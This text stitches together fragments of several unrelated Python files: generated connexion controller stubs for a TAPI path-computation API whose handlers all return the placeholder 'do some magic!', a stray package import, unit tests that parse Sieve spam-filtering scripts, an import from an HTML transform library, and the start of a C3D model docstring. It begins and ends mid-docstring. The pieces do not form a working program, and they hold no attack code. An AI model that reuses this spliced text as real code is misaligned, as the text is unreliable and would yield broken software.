:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_path_objective_function = TapiPathComputationPathObjectiveFunction.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_delete(uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_delete
removes tapi.path.computation.PathOptimizationConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_get(uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_get
returns tapi.path.computation.PathOptimizationConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:rtype: TapiPathComputationPathOptimizationConstraint
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_name_post(uuid, tapi_common_name_and_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_name_post
creates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_namevalue_name_delete(uuid, value_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_namevalue_name_delete
removes tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_namevalue_name_get(uuid, value_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_namevalue_name_get
returns tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:rtype: TapiCommonNameAndValue
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_namevalue_name_post(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_namevalue_name_post
creates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_namevalue_name_put(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_namevalue_name_put
creates or updates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added or updated
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_post(uuid, tapi_path_computation_path_optimization_constraint=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_post
creates tapi.path.computation.PathOptimizationConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_path_computation_path_optimization_constraint: tapi.path.computation.PathOptimizationConstraint to be added to list
:type tapi_path_computation_path_optimization_constraint: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_path_optimization_constraint = TapiPathComputationPathOptimizationConstraint.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_put(uuid, tapi_path_computation_path_optimization_constraint=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_optimization_constraint_put
creates or updates tapi.path.computation.PathOptimizationConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_path_computation_path_optimization_constraint: tapi.path.computation.PathOptimizationConstraint to be added or updated
:type tapi_path_computation_path_optimization_constraint: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_path_optimization_constraint = TapiPathComputationPathOptimizationConstraint.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_pathpath_uuid_get(uuid, path_uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_pathpath_uuid_get
returns tapi.path.computation.PathRef # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param path_uuid: Id of path
:type path_uuid: str
:rtype: TapiPathComputationPathRef
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_post(uuid, tapi_path_computation_path_computation_service=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_post
creates tapi.path.computation.PathComputationService # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_path_computation_path_computation_service: tapi.path.computation.PathComputationService to be added to list
:type tapi_path_computation_path_computation_service: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_path_computation_service = TapiPathComputationPathComputationService.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_put(uuid, tapi_path_computation_path_computation_service=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_put
creates or updates tapi.path.computation.PathComputationService # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_path_computation_path_computation_service: tapi.path.computation.PathComputationService to be added or updated
:type tapi_path_computation_path_computation_service: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_path_computation_service = TapiPathComputationPathComputationService.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_cost_characteristic_post(uuid, tapi_topology_cost_characteristic=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_cost_characteristic_post
creates tapi.topology.CostCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_topology_cost_characteristic: tapi.topology.CostCharacteristic to be added to list
:type tapi_topology_cost_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_cost_characteristic = TapiTopologyCostCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_cost_characteristiccost_name_delete(uuid, cost_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_cost_characteristiccost_name_delete
removes tapi.topology.CostCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param cost_name: Id of cost-characteristic
:type cost_name: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_cost_characteristiccost_name_get(uuid, cost_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_cost_characteristiccost_name_get
returns tapi.topology.CostCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param cost_name: Id of cost-characteristic
:type cost_name: str
:rtype: TapiTopologyCostCharacteristic
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_cost_characteristiccost_name_post(uuid, cost_name, tapi_topology_cost_characteristic=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_cost_characteristiccost_name_post
creates tapi.topology.CostCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param cost_name: Id of cost-characteristic
:type cost_name: str
:param tapi_topology_cost_characteristic: tapi.topology.CostCharacteristic to be added to list
:type tapi_topology_cost_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_cost_characteristic = TapiTopologyCostCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_cost_characteristiccost_name_put(uuid, cost_name, tapi_topology_cost_characteristic=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_cost_characteristiccost_name_put
creates or updates tapi.topology.CostCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param cost_name: Id of cost-characteristic
:type cost_name: str
:param tapi_topology_cost_characteristic: tapi.topology.CostCharacteristic to be added or updated
:type tapi_topology_cost_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_cost_characteristic = TapiTopologyCostCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_delete(uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_delete
removes tapi.path.computation.RoutingConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_get(uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_get
returns tapi.path.computation.RoutingConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:rtype: TapiPathComputationRoutingConstraint
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_latency_characteristic_post(uuid, tapi_topology_latency_characteristic=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_latency_characteristic_post
creates tapi.topology.LatencyCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_topology_latency_characteristic: tapi.topology.LatencyCharacteristic to be added to list
:type tapi_topology_latency_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_latency_characteristic = TapiTopologyLatencyCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_latency_characteristictraffic_property_name_delete(uuid, traffic_property_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_latency_characteristictraffic_property_name_delete
removes tapi.topology.LatencyCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param traffic_property_name: Id of latency-characteristic
:type traffic_property_name: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_latency_characteristictraffic_property_name_get(uuid, traffic_property_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_latency_characteristictraffic_property_name_get
returns tapi.topology.LatencyCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param traffic_property_name: Id of latency-characteristic
:type traffic_property_name: str
:rtype: TapiTopologyLatencyCharacteristic
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_latency_characteristictraffic_property_name_post(uuid, traffic_property_name, tapi_topology_latency_characteristic=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_latency_characteristictraffic_property_name_post
creates tapi.topology.LatencyCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param traffic_property_name: Id of latency-characteristic
:type traffic_property_name: str
:param tapi_topology_latency_characteristic: tapi.topology.LatencyCharacteristic to be added to list
:type tapi_topology_latency_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_latency_characteristic = TapiTopologyLatencyCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_latency_characteristictraffic_property_name_put(uuid, traffic_property_name, tapi_topology_latency_characteristic=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_latency_characteristictraffic_property_name_put
creates or updates tapi.topology.LatencyCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param traffic_property_name: Id of latency-characteristic
:type traffic_property_name: str
:param tapi_topology_latency_characteristic: tapi.topology.LatencyCharacteristic to be added or updated
:type tapi_topology_latency_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_latency_characteristic = TapiTopologyLatencyCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_post(uuid, tapi_path_computation_routing_constraint=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_post
creates tapi.path.computation.RoutingConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_path_computation_routing_constraint: tapi.path.computation.RoutingConstraint to be added to list
:type tapi_path_computation_routing_constraint: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_routing_constraint = TapiPathComputationRoutingConstraint.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_put(uuid, tapi_path_computation_routing_constraint=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_put
creates or updates tapi.path.computation.RoutingConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_path_computation_routing_constraint: tapi.path.computation.RoutingConstraint to be added or updated
:type tapi_path_computation_routing_constraint: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_routing_constraint = TapiPathComputationRoutingConstraint.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_risk_diversity_characteristic_post(uuid, tapi_topology_risk_characteristic=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_risk_diversity_characteristic_post
creates tapi.topology.RiskCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_topology_risk_characteristic: tapi.topology.RiskCharacteristic to be added to list
:type tapi_topology_risk_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_risk_characteristic = TapiTopologyRiskCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_risk_diversity_characteristicrisk_characteristic_name_delete(uuid, risk_characteristic_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_risk_diversity_characteristicrisk_characteristic_name_delete
removes tapi.topology.RiskCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param risk_characteristic_name: Id of risk-diversity-characteristic
:type risk_characteristic_name: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_risk_diversity_characteristicrisk_characteristic_name_get(uuid, risk_characteristic_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_risk_diversity_characteristicrisk_characteristic_name_get
returns tapi.topology.RiskCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param risk_characteristic_name: Id of risk-diversity-characteristic
:type risk_characteristic_name: str
:rtype: TapiTopologyRiskCharacteristic
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_risk_diversity_characteristicrisk_characteristic_name_post(uuid, risk_characteristic_name, tapi_topology_risk_characteristic=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_risk_diversity_characteristicrisk_characteristic_name_post
creates tapi.topology.RiskCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param risk_characteristic_name: Id of risk-diversity-characteristic
:type risk_characteristic_name: str
:param tapi_topology_risk_characteristic: tapi.topology.RiskCharacteristic to be added to list
:type tapi_topology_risk_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_risk_characteristic = TapiTopologyRiskCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_risk_diversity_characteristicrisk_characteristic_name_put(uuid, risk_characteristic_name, tapi_topology_risk_characteristic=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_routing_constraint_risk_diversity_characteristicrisk_characteristic_name_put
creates or updates tapi.topology.RiskCharacteristic # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param risk_characteristic_name: Id of risk-diversity-characteristic
:type risk_characteristic_name: str
:param tapi_topology_risk_characteristic: tapi.topology.RiskCharacteristic to be added or updated
:type tapi_topology_risk_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_risk_characteristic = TapiTopologyRiskCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_avoid_topologytopology_uuid_get(uuid, topology_uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_avoid_topologytopology_uuid_get
returns tapi.topology.TopologyRef # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param topology_uuid: Id of avoid-topology
:type topology_uuid: str
:rtype: TapiTopologyTopologyRef
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_delete(uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_delete
removes tapi.path.computation.TopologyConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_exclude_linktopology_uuidlink_uuid_get(uuid, topology_uuid, link_uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_exclude_linktopology_uuidlink_uuid_get
returns tapi.topology.LinkRef # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param topology_uuid: Id of exclude-link
:type topology_uuid: str
:param link_uuid: Id of exclude-link
:type link_uuid: str
:rtype: TapiTopologyLinkRef
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_exclude_nodetopology_uuidnode_uuid_get(uuid, topology_uuid, node_uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_exclude_nodetopology_uuidnode_uuid_get
returns tapi.topology.NodeRef # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param topology_uuid: Id of exclude-node
:type topology_uuid: str
:param node_uuid: Id of exclude-node
:type node_uuid: str
:rtype: TapiTopologyNodeRef
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_exclude_pathpath_uuid_get(uuid, path_uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_exclude_pathpath_uuid_get
returns tapi.path.computation.PathRef # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param path_uuid: Id of exclude-path
:type path_uuid: str
:rtype: TapiPathComputationPathRef
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_get(uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_get
returns tapi.path.computation.TopologyConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:rtype: TapiPathComputationTopologyConstraint
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_include_linktopology_uuidlink_uuid_get(uuid, topology_uuid, link_uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_include_linktopology_uuidlink_uuid_get
returns tapi.topology.LinkRef # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param topology_uuid: Id of include-link
:type topology_uuid: str
:param link_uuid: Id of include-link
:type link_uuid: str
:rtype: TapiTopologyLinkRef
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_include_nodetopology_uuidnode_uuid_get(uuid, topology_uuid, node_uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_include_nodetopology_uuidnode_uuid_get
returns tapi.topology.NodeRef # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param topology_uuid: Id of include-node
:type topology_uuid: str
:param node_uuid: Id of include-node
:type node_uuid: str
:rtype: TapiTopologyNodeRef
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_include_pathpath_uuid_get(uuid, path_uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_include_pathpath_uuid_get
returns tapi.path.computation.PathRef # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param path_uuid: Id of include-path
:type path_uuid: str
:rtype: TapiPathComputationPathRef
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_include_topologytopology_uuid_get(uuid, topology_uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_include_topologytopology_uuid_get
returns tapi.topology.TopologyRef # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param topology_uuid: Id of include-topology
:type topology_uuid: str
:rtype: TapiTopologyTopologyRef
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_post(uuid, tapi_path_computation_topology_constraint=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_post
creates tapi.path.computation.TopologyConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_path_computation_topology_constraint: tapi.path.computation.TopologyConstraint to be added to list
:type tapi_path_computation_topology_constraint: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_topology_constraint = TapiPathComputationTopologyConstraint.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_put(uuid, tapi_path_computation_topology_constraint=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_topology_constraint_put
creates or updates tapi.path.computation.TopologyConstraint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_path_computation_topology_constraint: tapi.path.computation.TopologyConstraint to be added or updated
:type tapi_path_computation_topology_constraint: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_topology_constraint = TapiPathComputationTopologyConstraint.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_pathuuid_get(uuid): # noqa: E501
"""data_context_path_computation_context_pathuuid_get
returns tapi.path.computation.Path # noqa: E501
:param uuid: Id of path
:type uuid: str
:rtype: TapiPathComputationPath
"""
return 'do some magic!'
def data_context_path_computation_context_pathuuid_linktopology_uuidlink_uuid_get(uuid, topology_uuid, link_uuid): # noqa: E501
"""data_context_path_computation_context_pathuuid_linktopology_uuidlink_uuid_get
returns tapi.topology.LinkRef # noqa: E501
:param uuid: Id of path
:type uuid: str
:param topology_uuid: Id of link
:type topology_uuid: str
:param link_uuid: Id of link
:type link_uuid: str
:rtype: TapiTopologyLinkRef
"""
return 'do some magic!'
def data_context_path_computation_context_pathuuid_namevalue_name_get(uuid, value_name): # noqa: E501
"""data_context_path_computation_context_pathuuid_namevalue_name_get
returns tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path
:type uuid: str
:param value_name: Id of name
:type value_name: str
:rtype: TapiCommonNameAndValue
"""
return 'do some magic!'
def data_context_path_computation_context_pathuuid_routing_constraint_cost_characteristiccost_name_get(uuid, cost_name): # noqa: E501
"""data_context_path_computation_context_pathuuid_routing_constraint_cost_characteristiccost_name_get
returns tapi.topology.CostCharacteristic # noqa: E501
:param uuid: Id of path
:type uuid: str
:param cost_name: Id of cost-characteristic
:type cost_name: str
:rtype: TapiTopologyCostCharacteristic
"""
return 'do some magic!'
def data_context_path_computation_context_pathuuid_routing_constraint_get(uuid): # noqa: E501
"""data_context_path_computation_context_pathuuid_routing_constraint_get
returns tapi.path.computation.RoutingConstraint # noqa: E501
:param uuid: Id of path
:type uuid: str
:rtype: TapiPathComputationRoutingConstraint
"""
return 'do some magic!'
def data_context_path_computation_context_pathuuid_routing_constraint_latency_characteristictraffic_property_name_get(uuid, traffic_property_name): # noqa: E501
"""data_context_path_computation_context_pathuuid_routing_constraint_latency_characteristictraffic_property_name_get
returns tapi.topology.LatencyCharacteristic # noqa: E501
:param uuid: Id of path
:type uuid: str
:param traffic_property_name: Id of latency-characteristic
:type traffic_property_name: str
:rtype: TapiTopologyLatencyCharacteristic
"""
return 'do some magic!'
def data_context_path_computation_context_pathuuid_routing_constraint_risk_diversity_characteristicrisk_characteristic_name_get(uuid, risk_characteristic_name): # noqa: E501
"""data_context_path_computation_context_pathuuid_routing_constraint_risk_diversity_characteristicrisk_characteristic_name_get
returns tapi.topology.RiskCharacteristic # noqa: E501
:param uuid: Id of path
:type uuid: str
:param risk_characteristic_name: Id of risk-diversity-characteristic
:type risk_characteristic_name: str
:rtype: TapiTopologyRiskCharacteristic
"""
return 'do some magic!'
def data_context_path_computation_context_post(tapi_path_computation_path_computation_context=None): # noqa: E501
"""data_context_path_computation_context_post
creates tapi.path.computation.PathComputationContext # noqa: E501
:param tapi_path_computation_path_computation_context: tapi.path.computation.PathComputationContext to be added to list
:type tapi_path_computation_path_computation_context: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_path_computation_context = TapiPathComputationPathComputationContext.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_put(tapi_path_computation_path_computation_context=None): # noqa: E501
"""data_context_path_computation_context_put
creates or updates tapi.path.computation.PathComputationContext # noqa: E501
:param tapi_path_computation_path_computation_context: tapi.path.computation.PathComputationContext to be added or updated
:type tapi_path_computation_path_computation_context: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_path_computation_context = TapiPathComputationPathComputationContext.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def operations_compute_p_2_p_path_post(inline_object=None): # noqa: E501
"""operations_compute_p2_p_path_post
# noqa: E501
:param inline_object:
:type inline_object: dict | bytes
:rtype: TapiPathComputationComputeP2PPath
"""
if connexion.request.is_json:
inline_object = InlineObject.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def operations_delete_p_2_p_path_post(inline_object11=None): # noqa: E501
"""operations_delete_p2_p_path_post
# noqa: E501
:param inline_object11:
:type inline_object11: dict | bytes
:rtype: TapiPathComputationDeleteP2PPath
"""
if connexion.request.is_json:
inline_object11 = InlineObject11.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def operations_optimize_p_2_p_path_post(inline_object26=None): # noqa: E501
"""operations_optimize_p2_p_path_post
# noqa: E501
:param inline_object26:
:type inline_object26: dict | bytes
:rtype: TapiPathComputationOptimizeP2PPath
"""
if connexion.request.is_json:
inline_object26 = InlineObject26.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
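Every generated stub above returns the `'do some magic!'` placeholder. As a framework-free sketch of how one of these GET handlers is typically completed, the hypothetical helper below mirrors `data_context_path_computation_context_pathuuid_get` against a hypothetical in-memory store (`PATH_STORE` and `get_path_example` are illustrative names, not part of the generated API):

```python
# Hypothetical in-memory store mapping path uuids to serialized Path dicts.
PATH_STORE = {
    "p-001": {"uuid": "p-001", "name": []},
}


def get_path_example(uuid):
    """Return (body, status): the stored path, or a 404-style error body."""
    path = PATH_STORE.get(uuid)
    if path is None:
        return {"message": "path not found"}, 404
    return path, 200
```

Connexion accepts a `(body, status)` tuple as a controller return value, so the real stub body could follow the same shape once a backing store exists.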
from . import lensing
from . import inference
import unittest
import checksieve
class TestSpamtest(unittest.TestCase):
def test_without_percent(self):
sieve = '''
require ["spamtest", "fileinto", "relational", "comparator-
i;ascii-numeric"];
if spamtest :value "eq" :comparator "i;ascii-numeric" "0"
{
fileinto "INBOX.unclassified";
}
elsif spamtest :value "ge" :comparator "i;ascii-numeric" "3"
{
fileinto "INBOX.spam-trap";
}
'''
self.assertFalse(checksieve.parse_string(sieve, False))
def test_with_percent(self):
sieve = '''
require ["spamtestplus", "fileinto", "relational",
"comparator-i;ascii-numeric"];
if spamtest :value "eq"
:comparator "i;ascii-numeric" "0"
{
fileinto "INBOX.unclassified";
}
elsif spamtest :percent :value "eq"
:comparator "i;ascii-numeric" "0"
{
fileinto "INBOX.not-spam";
}
elsif spamtest :percent :value "lt"
:comparator "i;ascii-numeric" "37"
{
fileinto "INBOX.spam-trap";
}
else
{
discard;
}
'''
self.assertFalse(checksieve.parse_string(sieve, False))
def test_with_count(self):
sieve = '''
require ["spamtestplus", "fileinto", "relational",
"comparator-i;ascii-numeric"];
if spamtest :percent :count "eq"
:comparator "i;ascii-numeric" "0"
{
fileinto "INBOX.unclassified";
}
elsif spamtest :percent :value "eq"
:comparator "i;ascii-numeric" "0"
{
fileinto "INBOX.not-spam";
}
elsif spamtest :percent :value "lt"
:comparator "i;ascii-numeric" "37"
{
fileinto "INBOX.spam-trap";
}
else
{
discard;
}
'''
self.assertFalse(checksieve.parse_string(sieve, False))
if __name__ == '__main__':
    unittest.main()
from htmlmth.utils import TransformFunction, http_payload_to_tfarg_function, normalized_headers_to_tfarg_function, string_to_tfarg_function, mime_type_based_transform, replace_apply_replace_back
"""
This is the c3d implementation with batch norm.
References
----------
[1] Tran, Du, et al. "Learning spatiotemporal features with 3d convolutional networks."
